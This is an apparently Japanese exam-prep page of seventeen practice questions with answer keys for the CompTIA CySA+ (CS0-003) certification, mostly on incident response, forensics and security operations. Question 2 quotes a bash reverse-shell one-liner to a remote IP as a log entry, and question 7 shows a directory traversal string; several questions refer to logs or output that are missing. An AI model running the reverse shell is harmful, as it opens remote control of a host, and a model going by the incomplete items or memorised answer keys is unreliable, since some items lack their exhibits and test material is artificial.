CS0-003無料問題集「CompTIA Cybersecurity Analyst (CySA+) Certification」

質問 1

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Choose two.)

（A）Write blocker

（B）Crime scene tape

（C）Thumb drive

（D）Signal-shielded bag

（E）Drive duplicator

（F）Tamper-evident seal

正解：D、F 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 2

A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

（A）#!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" || echo "OK"

（B）#!/bin/bash
ps -fea | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"

（C）#!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" || echo "OK"

（D）#!/bin/bash
netstat -antp | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 3

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

（A）The cybersecurity analyst is looking at the wrong information

（B）The NTP server is not configured on the host

（C）The host with the logs is offline

（D）The firewall is using UTC time

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 4

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?

（A）PCI DSS

（B）ISO 27001

（C）ITIL

（D）COBIT

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 5

A cybersecurity analyst needs to harden a server that is currently being used as a web server.
The server needs to be accessible when entering www.company.com into the browser.
Additionally, web pages require frequent updates, which are performed by a remote contractor.
Given the following output:

Which of the following should the cybersecurity analyst recommend to harden the server?
(Choose two.)

（A）Perform a vulnerability scan

（B）Change the server's IP to a private IP address

（C）Disable the Telnet service

（D）Uninstall the DNS service

（E）Block port 80 with the host-based firewall

（F）Change the SSH port to a non-standard port

正解：C、D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 6

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

（A）Include a table of contents outlining the entire report

（B）Decide on the color scheme that will effectively communicate the metrics

（C）Determine the sophistication of the audience that the report is meant for

（D）Include references and sources of information on the first page

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 7

While reviewing the web server logs, a security analyst notices the following snippet:
.. \ .. / .. \ .. /boot.ini
Which of the following Is belng attempted?

（A）Remote code execution

（B）Remote file inclusion

（C）Cross-site scripting

（D）Directory traversal

（E）Enumeration of /etc/passwd

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 8

While implementing a PKI for a company, a security analyst plans to utilize a dedicated server as the certificate authority that is only used to sign intermediate certificates.
Which of the following are the MOST secure states for the certificate authority server when it is not in use? (Choose two.)

（A）VPN accessible only

（B）Backed up hourly

（C）Air gapped

（D）Powered off

（E）On a private VLAN

（F）Full disk encrypted

正解：C、F 解答を投票する

質問 9

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

（A）SPF

（B）DMARC

（C）SMTP

（D）DKIM

正解：A 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 10

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

（A）Ransomware group

（B）Insider threat

（C）Organized crime

（D）Nation-state

正解：D 解答を投票する

質問 11

A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site's standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?

（A）This is a normal password change URL.

（B）A new VPN gateway has been deployed.

（C）The security operations center is performing a routine password audit.

（D）A social engineering attack is underway.

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 12

A cybersecurity team lead is developing metrics to present in the weekly executive briefs.
Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

（A）Mean time between failures

（B）Mean time to detect

（C）Mean time to contain

（D）Mean time to remediate

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 13

A security analyst receives an alert for suspicious activity on a company laptop. An excerpt of the log is shown below:

Which of the following has most likely occurred?

（A）A phishing link in an email was clicked

（B）A credential-stealing website was visited.

（C）A web browser vulnerability was exploited.

（D）An Office document with a malicious macro was opened.

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 14

A cyber-security analyst is implementing a new network configuration on an existing network access layer to prevent possible physical attacks. Which of the following BEST describes a solution that would apply and cause fewer issues during the deployment phase?

（A）Configure 802.1X and EAPOL across the network

（B）Deploy network address protection with DHCP and dynamic VLANs.

（C）Implement software-defined networking and security groups for isolation

（D）Implement port security with one MAC address per network port of the switch.

正解：D 解答を投票する

質問 15

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASE to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

（A）SIEM ingestion logs are reduced by 20%.

（B）Phishing alerts drop by 20%.

（C）The MTTR decreases by 20%.

（D）False positive rates drop to 20%.

正解：D 解答を投票する

質問 16

During routine monitoring a security analyst identified the following enterprise network traffic:
Packet capture output:

Which of the following BEST describes what the security analyst observed?

（A）192.168.12.21 made a TCP connection to 209.132.177.50

（B）209.132.177.50 set up a TCP reset attack to 192.168.12.21

（C）192.168.12.21 made a TCP connection to 66.187.224.210

（D）66.187.224.210 set up a DNS hijack with 192.168.12.21.

正解：A 解答を投票する

質問 17

The analyst reviews the following endpoint log entry:

Which of the following has occurred?

（A）Rename computer

（B）Registry change

（C）Privilege escalation

（D）New account introduced

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

CS0-003 無料問題集「CompTIA Cybersecurity Analyst (CySA+) Certification」

弊社を連絡する

関連リンク

トップ試験